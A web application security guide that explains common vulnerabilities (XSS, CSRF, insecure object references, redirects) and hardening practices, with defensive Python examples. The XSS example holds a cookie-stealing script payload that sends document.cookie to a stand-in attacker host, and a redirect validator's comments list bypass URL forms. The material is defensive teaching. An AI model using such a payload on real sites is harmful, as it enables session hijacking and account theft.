How to improve your website/web app security
This post looks at the state of website and web application security in plain terms. It also discusses the most effective ways for organizations to achieve lasting improvements in the security of the code they deploy to, or remove from, their websites.
Most Common Website/Web App Security Vulnerabilities
SQL injection is one of the most common website security vulnerabilities. It occurs when an attacker supplies input that the application pastes into a database query as SQL code rather than treating it as data. If the attack succeeds, it lets the attacker read, retrieve, insert, alter or delete the data stored in the back-end database, and in some configurations execute administrative operations against it.
CROSS SITE SCRIPTING (XSS)
Cross-site scripting occurs when an application includes untrusted input in a page it sends to the browser without encoding it, so that an attacker's script runs in other users' browsers with the privileges of those users' sessions. The defense is to treat all output as data and encode it for the context (HTML body, attribute, JavaScript, URL) into which it is inserted.
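As an added example that is not part of the original article, here is a search results page that echoes the query back into HTML, first without encoding and then with it. The payload is constructed attacker input of the kind that would arrive in a ?q= parameter.

```python
import html

# Added example, not from the original article. A search page that echoes
# the query back into HTML; PAYLOAD is constructed attacker input such
# as would arrive in a ?q= parameter.

PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"

def render_vulnerable(query: str) -> str:
    # Untrusted text concatenated straight into markup: the browser parses
    # the <script> element and runs it in the victim's origin.
    return f"<p>Results for: {query}</p>"

def render_safe(query: str) -> str:
    # Output encoding for the HTML body context: < > & " ' become entities,
    # so the same bytes are displayed as text instead of being parsed.
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"

def has_live_script(rendered: str) -> bool:
    # Deliberately crude check, used only to show the difference here.
    return "<script" in rendered.lower()

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))  # script tag reaches the browser intact
    print(render_safe(PAYLOAD))        # &lt;script&gt;... is shown as text
```

Encoding has to match the context: html.escape is correct for text between tags and for quoted attribute values, but a value dropped inside a script block or a URL needs JavaScript or URL encoding instead. Template engines with auto-escaping on by default, plus a Content-Security-Policy header, give the same protection with fewer chances to forget.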
BROKEN AUTHENTICATION & SESSION MANAGEMENT
Broken authentication and session management covers a group of weaknesses, all of them concerned with keeping hold of a user's identity. If authentication credentials and session identifiers are not protected at all times, an attacker can hijack an active session and assume the identity of the user.
INSECURE DIRECT OBJECT REFERENCES
An insecure direct object reference occurs when a website exposes a reference to an internal implementation object, such as a file, directory, database record or database key, in a URL or form parameter. An attacker who can see such a reference can manipulate it to reach another user's private data.
This technique is typically used by an attacker who already has a valid account. They simply change a parameter value that refers to one object so that it refers to another, gaining access to data they are not authorized to see. Every object reference must be protected: check that the authenticated user is authorized for the specific resource requested, or use indirect references that are mapped only to the values that user is permitted to access.
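As an added example, not code from the original article, the block below shows both defenses just described: an ownership check on every direct lookup, and a per-session map of opaque handles to real ids so that database keys never appear in URLs. The invoice table, user names and the Forbidden exception are constructed for the demonstration.

```python
import secrets
from typing import Dict, List

# Added example, not from the original article. Constructed invoice table
# keyed by the real database id; two users own one invoice each.
INVOICES: Dict[int, dict] = {
    1001: {"owner": "alice", "amount": 120.0},
    1002: {"owner": "bob",   "amount": 75.5},
}

class Forbidden(Exception):
    pass

def get_invoice_vulnerable(invoice_id: int) -> dict:
    # Returns whatever id the client asks for: /invoice?id=1002 leaks Bob's data
    # to Alice, who merely edited the number in her address bar.
    return INVOICES[invoice_id]

def get_invoice_checked(current_user: str, invoice_id: int) -> dict:
    # A direct reference is acceptable only if authorization is enforced against
    # the authenticated session user, never against a client-supplied field.
    inv = INVOICES.get(invoice_id)
    if inv is None or inv["owner"] != current_user:
        # One response for "missing" and "not yours" prevents id enumeration.
        raise Forbidden("no such invoice")
    return inv

class IndirectRefMap:
    """Per-session map from opaque handles to real ids. A handle issued in one
    session means nothing in another, and ids never reach the client."""
    def __init__(self):
        self._handle_to_id: Dict[str, int] = {}

    def handle_for(self, real_id: int) -> str:
        for handle, rid in self._handle_to_id.items():
            if rid == real_id:
                return handle
        handle = secrets.token_urlsafe(16)
        self._handle_to_id[handle] = real_id
        return handle

    def resolve(self, handle: str) -> int:
        if handle not in self._handle_to_id:
            raise Forbidden("unknown reference")
        return self._handle_to_id[handle]

def user_invoice_handles(current_user: str, refmap: IndirectRefMap) -> List[str]:
    # Only the caller's own invoices are ever given a handle in their session,
    # so there is nothing to tamper with that could point at someone else's.
    return [refmap.handle_for(i) for i, inv in INVOICES.items() if inv["owner"] == current_user]

def denied(fn, *args) -> bool:
    # Small helper for the demonstration: True if the call was refused.
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```

The ownership check is the one that matters; indirect references are an extra layer that also hides how many records exist and how they are numbered.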
SECURITY MISCONFIGURATION
Security misconfiguration covers many kinds of weakness, all stemming from a lack of maintenance or attention to the web application's configuration. A secure configuration must be defined and deployed for the application, its frameworks, the application server, web server, database server and platform. Misconfiguration can give an attacker access to sensitive data or functionality and can end in a complete compromise of the system.
Default accounts, unused pages, unpatched flaws and exposed directories can all be abused to gain unauthorized access. Hardening should be applied across the entire application stack to prevent this. Software (including all code libraries) should be kept up to date, and unneeded ports, services, pages and accounts should be removed. The security settings of development frameworks such as Spring or Struts should be configured deliberately rather than left at their defaults.
CROSS-SITE REQUEST FORGERY (CSRF)
Cross-Site Request Forgery (CSRF), also known as XSRF, is an attack that forces an end user to perform unwanted actions on a website to which they are currently authenticated. A third-party page causes the victim's browser to send a request to a web application where the user is already logged in (for example, their bank). Because the browser attaches the session cookie automatically, the attacker's request is processed with the victim's privileges.
A successful CSRF attack can be damaging for both the business and the user. It can result in damaged customer relationships, unauthorized fund transfers, changed passwords or contact details, and data theft.
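As an added example that is not part of the original article, the block below implements the standard synchronizer-token defense: the server derives a token tied to the session, embeds it in every state-changing form, and refuses a request whose token is missing or wrong. The secret is generated on the spot for the demo (real code loads it from configuration), and the bank-transfer handler, session id and balances are constructed.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Added example, not from the original article. SERVER_SECRET is generated
# here for the demo; real code loads it from configuration.
SERVER_SECRET = secrets.token_bytes(32)

def csrf_token(session_id: str) -> str:
    # Keyed on the session, so a token the attacker obtains from their own
    # session is useless against the victim's.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def verify_csrf(session_id: str, submitted: Optional[str]) -> bool:
    if not submitted:
        return False
    # Constant-time comparison; a plain == would leak the token byte by byte.
    return hmac.compare_digest(csrf_token(session_id), submitted)

def transfer_funds(request: Dict, balances: Dict[str, int]) -> str:
    # Simulated POST /transfer. The session id arrives in the cookie the
    # browser attaches automatically; the token must come from the form body.
    sid = request["cookie_session"]
    form = request["form"]
    if not verify_csrf(sid, form.get("csrf_token")):
        return "403 Forbidden: missing or invalid CSRF token"
    balances[form["to"]] = balances.get(form["to"], 0) + int(form["amount"])
    return "200 OK"

def demo() -> Tuple[str, str, Dict[str, int]]:
    balances: Dict[str, int] = {}
    victim_sid = "victim-session-id"          # constructed
    # The victim submits the real form, which carries the token the server
    # rendered into the page.
    genuine = {"cookie_session": victim_sid,
               "form": {"to": "bob", "amount": "100", "csrf_token": csrf_token(victim_sid)}}
    # attacker.example auto-submits a hidden form. The browser still sends the
    # victim's cookie, but the same-origin policy stops the attacker's page from
    # reading the victim's token, so the forged request has none.
    forged = {"cookie_session": victim_sid,
              "form": {"to": "mallory", "amount": "100"}}
    return transfer_funds(genuine, balances), transfer_funds(forged, balances), balances
```

Marking the session cookie SameSite=Lax or Strict stops the browser attaching it to most cross-site requests in the first place and is worth doing as well; the token remains the primary check because older clients and some request shapes are not covered by SameSite.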
Insufficient Transport Layer Protection
If traffic between the browser and the server is not protected end to end, an attacker who can observe it can expose data and steal accounts. A weak TLS configuration can also make man-in-the-middle and phishing attacks easier. The simplest approach is to require HTTPS for the entire site, or at the very least on every authenticated page. The TLS configuration should allow only strong protocol versions and cipher suites, and the Secure flag should be set on all cookies so they are never sent over plain HTTP.
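As an added example, not code from the original article, here are the server-side settings the paragraph describes expressed with Python's standard ssl module, together with the cookie attributes and the HSTS header that belong with them. The cipher string, header values and cookie name are our own choices.

```python
import ssl
from typing import Dict, List

# Added example, not from the original article. Suite names containing any
# of these markers use legacy or non-AEAD constructions and should not be on.
WEAK_MARKERS = ("RC4", "MD5", "DES", "CBC", "NULL", "EXPORT")

def server_tls_context() -> ssl.SSLContext:
    ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    # SSL 2/3 and TLS 1.0/1.1 are refused; TLS 1.2 is the floor.
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # Only forward-secret AEAD suites for TLS 1.2 (OpenSSL cipher-list syntax).
    # TLS 1.3 suites are managed separately by OpenSSL and are all AEAD.
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!eNULL")
    # In a real deployment the certificate and key are loaded here:
    # ctx.load_cert_chain("/etc/ssl/private/site.pem")
    return ctx

def min_version_name(ctx: ssl.SSLContext) -> str:
    return ctx.minimum_version.name

def weak_ciphers_enabled(ctx: ssl.SSLContext) -> List[str]:
    # Audit helper: names of enabled suites that match a weak marker.
    return [c["name"] for c in ctx.get_ciphers()
            if any(m in c["name"] for m in WEAK_MARKERS)]

def security_headers() -> Dict[str, str]:
    # HSTS: a browser that has seen this header refuses plain HTTP to the site
    # for a year, closing the window for SSL-stripping attacks.
    return {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"}

def session_cookie(name: str, value: str) -> str:
    # Secure: never sent over plain HTTP. HttpOnly: invisible to page scripts.
    # SameSite=Lax: not attached to most cross-site requests.
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

Most sites terminate TLS in a reverse proxy or load balancer rather than in application code; the same three decisions (minimum version, cipher suites, HSTS) are what to look for in that configuration.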
Failure to Restrict URL Access
This vulnerability is so easy to exploit that it must not be ignored. If the hole exists, an attacker, whether an authenticated user or not, can simply edit a URL to reach a privileged page and from there escalate their privileges further. Developers must verify every page and make sure that external access controls or code-level checks are correctly configured for each one. Policies should be configurable rather than hard-coded, and enforcement should deny access by default, granting it only to users explicitly authorized for the resource.
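The following is an added example, not code from the original article: one deny-by-default authorization check that runs before any page handler, with the request path normalised first so that variants such as /account/../admin or //admin cannot slip past the rule for /admin. The routes and roles are constructed.

```python
import posixpath
from typing import List, Set, Tuple
from urllib.parse import unquote, urlsplit

# Added example, not from the original article. (path, roles) rules.
# A rule for "/x" also covers "/x/anything"; the rule for "/" is exact.
ROUTE_POLICY: List[Tuple[str, Set[str]]] = [
    ("/",        {"anonymous", "user", "admin"}),
    ("/login",   {"anonymous", "user", "admin"}),
    ("/account", {"user", "admin"}),
    ("/admin",   {"admin"}),
]

def normalize_path(raw: str) -> str:
    # Decode once, drop the query string, collapse "." and ".." segments and
    # duplicate slashes, so "/account/../admin" and "//admin" cannot dodge the
    # "/admin" rule by merely looking different from it.
    path = unquote(urlsplit(raw).path) or "/"
    path = posixpath.normpath(path)
    return "/" + path.lstrip("/")

def is_authorized(raw_path: str, role: str) -> bool:
    path = normalize_path(raw_path)
    best = None
    for prefix, roles in ROUTE_POLICY:
        exact = path == prefix
        under = prefix != "/" and path.startswith(prefix + "/")
        if (exact or under) and (best is None or len(prefix) > len(best[0])):
            best = (prefix, roles)      # most specific rule wins
    # No matching rule means no access: there is no implicit allow.
    return best is not None and role in best[1]

def dispatch(raw_path: str, role: str) -> int:
    # The HTTP status the framework would send before any handler runs.
    return 200 if is_authorized(raw_path, role) else 403
```

Putting the check in one place, in front of the router, is what makes "verify every page" achievable: a page that nobody added to the policy is unreachable rather than accidentally public.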
Unvalidated Redirects and Forwards
Here an attacker crafts a link to an unvalidated redirect on your site and tries to trick visitors into clicking it. Because the link points to a site they trust, users are more likely to be fooled. Attackers also target unchecked forwards to bypass security checks. The simplest defense is to avoid redirects and forwards altogether. Alternatively, compute the destination on the server without using user-supplied input. If neither is possible, make sure the supplied values are validated and authorized for the user before redirecting.
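As an added example, not code from the original article, the block below shows the two workable options from the paragraph: a lookup table so the client only names a destination, and, where a URL must be accepted, validation that it resolves to one of our own hosts. The origin, hostnames and target names are constructed.

```python
from typing import Optional
from urllib.parse import urljoin, urlsplit

# Added example, not from the original article. Constructed site identity.
SITE_ORIGIN = "https://www.example.com"
ALLOWED_HOSTS = {"www.example.com", "example.com"}

# Preferred: the client names a destination and the server looks up the URL,
# so user input never reaches the Location header at all.
NAMED_TARGETS = {"home": "/", "account": "/account", "orders": "/orders"}

def redirect_by_name(name: str, default: str = "/") -> str:
    return NAMED_TARGETS.get(name, default)

def safe_redirect_target(next_param: Optional[str], default: str = "/") -> str:
    if not next_param:
        return default
    # Some browsers read "\" as "/", and control characters can split headers;
    # refuse both outright rather than trying to normalise them.
    if "\\" in next_param or any(ord(c) < 0x20 or ord(c) == 0x7F for c in next_param):
        return default
    # Resolve against our own origin. A relative path stays on-site, while
    # "//evil.example/x", "https://evil.example" and
    # "https://www.example.com@evil.example" all resolve to a foreign host.
    resolved = urljoin(SITE_ORIGIN, next_param)
    parts = urlsplit(resolved)
    if parts.scheme != "https" or parts.netloc.lower() not in ALLOWED_HOSTS:
        return default
    return resolved
```

Checking the netloc of the resolved URL, rather than testing whether the raw string "starts with /", is what catches the protocol-relative and userinfo tricks in the comments above.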
Insecure Cryptographic Storage
Attackers rarely break the cryptography itself. Instead they find the keys, obtain plaintext copies of the data, or find a channel that decrypts it for them automatically. To protect sensitive data you must encrypt it everywhere it is stored long-term, and both the keys and any decrypted copies of the data must be guarded by requiring authorization to reach them.
HOW TO MAKE YOUR WEBSITE/WEB APP SECURE:
Cyber-attacks are growing in prominence every day, from influencing major elections to paralysing businesses overnight, and the part cyber aggression plays in our daily lives should not be underestimated. Daunting as that is, there is a great deal you can do to make sure your website is as secure as possible. Below are some of the most important steps for reducing the chances of your website being attacked.
Update And Do It Often
Face the hard fact: if you do not regularly update all the software and hardware in your business, including everything that runs your website, you will get hacked. It is not a matter of 'if' but of 'when'. Updating everything can be a nuisance, especially when you are trying to run a business, but not updating will at best cause frustration and at worst put your company out of business for good.
According to the ITRC Data Breach Report of 31 March 2019, more than half of the security breaches recorded targeted businesses and exposed over 18 million records. Updating therefore means servers, website platforms and plug-ins, your computer software and hardware, firewalls, and every other piece of software and hardware that keeps your business running.
Stay Updated On Latest Threats
In addition to keeping your hardware and software current, it is a good idea to keep up with the latest security incidents reported around the world. The simplest way is to follow IT security news sources and read about the most important new threats as they are reported.
An IT company that supports your business can also help limit data breaches. Staying informed and discussing how new threats could affect your business goes a long way towards preventing problems, and such a partner can help support your website/web app security.
Passwords and 2-Factor Authentication
This one should hardly need saying because it is so basic. Unfortunately, people still do not take password security seriously enough. Yes, it is tedious to create a strong password, and harder still to remember it once you have, but it is absolutely necessary.
Attackers are very good at getting into places they should not be. A weak password is like leaving your front door open with a note saying "Take what you want". So commit to not giving them easy access. Here are some reliable methods for creating strong passwords; getting this right is one of the factors that underpins your website/web app security.
1) They must be complex and random.
Do not use your name, date of birth, pet's name, child's name, favourite team, etc. Such passwords are very easy to guess with minimal information about you. Use a mix of uppercase and lowercase letters, numbers and symbols.
2) Passwords must be at least 12 characters long.
The longer the password, the harder it is to guess or brute-force, and the cost grows exponentially with every character added. The exact cracking times quoted for a given length vary enormously with the character set, the hashing algorithm used to store the password and the attacker's hardware, but the figures commonly cited make the point: a 7-character password can fall in milliseconds, a 9- or 10-character one in days to months, and a random 12-character password in centuries.
3) The passwords must be unique.
Do not reuse passwords. Every password you create should be unique, so that if one is compromised the breach does not spread to all your accounts. Attackers love to discover a person's password because they then try it against every other site that person uses (credential stuffing). Since people are predictable, a single stolen password frequently unlocks several accounts.
Most people do not follow these simple rules for one reason: they are afraid of forgetting the password. It is a reasonable fear, and one we all share, but there are some things you can do to help.
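The following is an added example, not code from the original article: a check that enforces the three rules above when an account is created or a password is changed, including the uniqueness rule, which it verifies against the user's previous password hashes so the old passwords themselves never need to be kept. The small COMMON_PASSWORDS set is a constructed stand-in for a real breached-password list, and the scrypt parameters are a reasonable default of our own.

```python
import hashlib
import hmac
import secrets
import string
from typing import Iterable, List, Optional, Sequence, Tuple

# Added example, not from the original article. COMMON_PASSWORDS is a tiny
# constructed stand-in for a real breached-password list.
MIN_LENGTH = 12
COMMON_PASSWORDS = {"password1234", "qwerty123456", "letmein12345", "iloveyou2019"}

def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    # Random per-password salt plus a memory-hard KDF, so a stolen table cannot
    # be attacked with precomputed tables or cheap GPU hashing.
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return salt, digest

def check_password_policy(password: str,
                          personal_terms: Sequence[str] = (),
                          previous_hashes: Iterable[Tuple[bytes, bytes]] = ()) -> List[str]:
    """Returns the list of rule violations; an empty list means the password passes."""
    problems: List[str] = []
    # Rule 2: length.
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    # Rule 1: complexity, and nothing guessable from the user's profile.
    classes = (any(c.islower() for c in password), any(c.isupper() for c in password),
               any(c.isdigit() for c in password), any(c in string.punctuation for c in password))
    if sum(classes) < 3:
        problems.append("use at least three of: lowercase, uppercase, digits, symbols")
    lowered = password.lower()
    for term in personal_terms:
        if len(term) >= 3 and term.lower() in lowered:
            problems.append(f"contains personal information: {term}")
    if lowered in COMMON_PASSWORDS:
        problems.append("appears in a list of commonly used passwords")
    # Rule 3: uniqueness, checked against the user's previous password hashes
    # without ever storing the old passwords themselves.
    for salt, digest in previous_hashes:
        if hmac.compare_digest(hash_password(password, salt)[1], digest):
            problems.append("reuses a previous password")
            break
    return problems
```

Re-hashing the candidate with each old salt is what makes the reuse check possible without keeping plaintext; with a slow KDF this costs a few tens of milliseconds per previous password, which is acceptable at change time but a reason to keep the history short.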
1) Use a password manager.
There are many, and several are free. Stick to well-known ones such as LastPass, KeePass or 1Password, but do your research and choose the one that suits you. Password managers not only store your passwords but can also generate strong random ones and change them for you.
2) Create a formula for creating your password.
There are many ways to build a formula, and you can find many ideas for creating passwords from different formulas; choose the one that suits you best. Bear in mind that a formula which produces related passwords for different sites is weaker than the random, unrelated passwords a manager generates, because one leaked password can reveal the pattern.
Only One Website per Server
If you or your company run multiple websites, make sure each is hosted on its own server. Many people assume that an unlimited hosting plan means they can put all their sites in one place, but doing so is very risky. Why? Because if an attacker manages to compromise the server, they reach all your websites and databases at once.
Once attackers are on one site they can steal all its sensitive data and plant malware, and if other sites share the same server those can be infected too. So give each website its own hosting plan and its own server; that way, if one site is hacked, the others remain safe. Also make sure that the passwords for all your websites are different.
Control of access to the website
The basic rule is to give access to your website only to those who absolutely need it, and to give them only as much access as their work requires. This is called the principle of least privilege.
Too many people with access to the website makes it more vulnerable not only to security breaches but also to human error. The more people who can make changes, the more likely it is that something serious will go wrong.
Among those who are allowed access, make sure each has their own login and password and is permitted to perform only the tasks they need to. It is also wise to put in place a policy of regularly reviewing access permissions and removing the accounts of people who have changed role or left the organization. Every account that exists is another potential way in for an attacker, so close every "door" that is no longer needed.
Backup and do it often
This one ranks alongside strong passwords: most people know it matters, yet too many do not do it. If you are one of them, your chances of recovering your data and restoring your business quickly after an incident are virtually nil. With frequent backups, your company's website and all of its data can be returned to service quickly, reducing downtime for your business.
It is not just about taking regular backups, important as that is. You should also periodically test the backups of your website to make sure they are complete and not corrupted. In a survey conducted by Barkly, 100% of the IT professionals surveyed said they were actively backing up their data and 80% said they were confident they could fully recover it after a security breach. In practice, only 40% of ransomware victims were able to recover all their data from backups, mainly because of failed or incomplete backups that left gaps in the data.
Backups will not prevent your site from being hacked, but they make getting it back up much faster once it has been. Make sure that the databases are backed up as well as the website's files.
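As an added example, not code from the original article, the block below bundles the site files and a database dump into one archive, records a SHA-256 digest for every member in a manifest, and verifies the archive against that manifest afterwards. That verification step is what turns "we have backups" into "we have backups that restore". The demo() function builds constructed sample content in a temporary directory and then truncates the archive to show what a failed backup looks like.

```python
import hashlib
import json
import tarfile
import tempfile
import zlib
from pathlib import Path
from typing import Dict, List, Tuple

# Added example, not from the original article. demo() builds constructed
# sample content in a temporary directory; nothing here touches a real site.

def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def create_backup(site_dir: Path, db_dump: Path, out_dir: Path) -> Tuple[Path, Path]:
    archive = out_dir / "backup.tar.gz"
    manifest = out_dir / "backup.manifest.json"
    entries: Dict[str, str] = {}
    with tarfile.open(archive, "w:gz") as tar:
        for f in sorted(p for p in site_dir.rglob("*") if p.is_file()):
            name = "site/" + f.relative_to(site_dir).as_posix()
            tar.add(f, arcname=name)
            entries[name] = sha256_bytes(f.read_bytes())
        # The database is part of the site; a files-only backup cannot restore it.
        tar.add(db_dump, arcname="db/dump.sql")
        entries["db/dump.sql"] = sha256_bytes(db_dump.read_bytes())
    meta = {"files": entries, "archive_sha256": sha256_bytes(archive.read_bytes())}
    manifest.write_text(json.dumps(meta, indent=2))
    return archive, manifest

def verify_backup(archive: Path, manifest: Path) -> List[str]:
    """Returns a list of problems; an empty list means the backup is intact."""
    problems: List[str] = []
    meta = json.loads(manifest.read_text())
    if sha256_bytes(archive.read_bytes()) != meta["archive_sha256"]:
        problems.append("archive checksum mismatch")
    seen = set()
    try:
        with tarfile.open(archive, "r:gz") as tar:
            for member in tar.getmembers():
                if not member.isfile():
                    continue
                data = tar.extractfile(member).read()
                expected = meta["files"].get(member.name)
                if expected is None:
                    problems.append(f"unexpected member {member.name}")
                elif sha256_bytes(data) != expected:
                    problems.append(f"corrupt member {member.name}")
                seen.add(member.name)
    except (tarfile.TarError, OSError, EOFError, zlib.error) as exc:
        problems.append(f"archive unreadable: {exc}")
    problems.extend(f"missing member {n}" for n in meta["files"] if n not in seen)
    return problems

def demo() -> Tuple[List[str], List[str]]:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        site = root / "site"
        (site / "css").mkdir(parents=True)
        (site / "index.html").write_text("<h1>constructed sample site</h1>")
        (site / "css" / "main.css").write_text("body { margin: 0 }")
        dump = root / "dump.sql"
        dump.write_text("CREATE TABLE users (id INTEGER PRIMARY KEY);")
        out = root / "backups"
        out.mkdir()
        archive, manifest = create_backup(site, dump, out)
        intact = verify_backup(archive, manifest)
        # Simulate a backup that was cut short, e.g. by a full disk.
        data = archive.read_bytes()
        archive.write_bytes(data[: len(data) // 2])
        truncated = verify_backup(archive, manifest)
        return intact, truncated
```

Keep the manifest, and ideally the archive, on separate storage from the server being backed up, and run the verification on a schedule rather than only when you need to restore; a full test restore to a scratch environment every so often is the only check that proves the database dump actually loads.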
Get a TLS/SSL certificate (HTTPS) for your website/web app security
Although a certificate does not protect your website from being hacked, it protects the information exchanged between your site and your users' browsers by encrypting all communication. Every website should have one, especially an e-commerce site that handles payment details.
All websites benefit from serving their traffic over HTTPS. With so many security breaches in the news, savvy users are increasingly used to checking for "https" at the start of a website's URL and the padlock icon in the address bar before trusting a site with their data. Give visitors to your website that peace of mind by encrypting all communication with a properly configured certificate.
Disable automatic form filling
Think about the forms on your website. Browsers can remember what a visitor typed into them and offer to fill the same details in again on their next visit. That is not good for your visitors or your business: if a visitor's computer or phone is stolen, whoever has it can submit forms or log in as the victim simply by accepting the autofill suggestions. For sensitive fields such as login, payment and personal-data inputs, ask the browser not to remember values (the autocomplete attribute on the form or field), and be aware that modern browsers often ignore this hint for password fields in favour of their own password managers. Convenient as autofill is for visitors, it is a weakness you should not leave open on sensitive forms.
Limit or eliminate file uploads
Any website that lets visitors upload files opens a door, and it does not take a malicious attacker to upload a file containing malware: an ordinary user may not know that their file is infected. Whatever scanning you have in place, malicious files can get through, and once one is executed on the server an attacker can gain access to your website and all its data.
Ideally, accept no uploads at all. However, it is sometimes necessary to allow file uploads for various reasons. If that is the case for your website, make sure that every uploaded file is stored outside the web root, so that the web server can never execute it. If you do not know how to do this, your web host can help you set it up.
Do not store payment data on your servers
Everything you store on your servers can be stolen in the event of a breach, and there are some types of data you should not store at all. Payment data in particular brings heavy responsibilities with it.
That is why it is best to let the payment provider you use for processing store and protect card data on their own systems. They are built and audited to protect exactly this type of data.
So, now that you know some of the main things you can do to secure your website, draw up an action plan for website/web app security and put it into effect right away. You will never regret being proactive.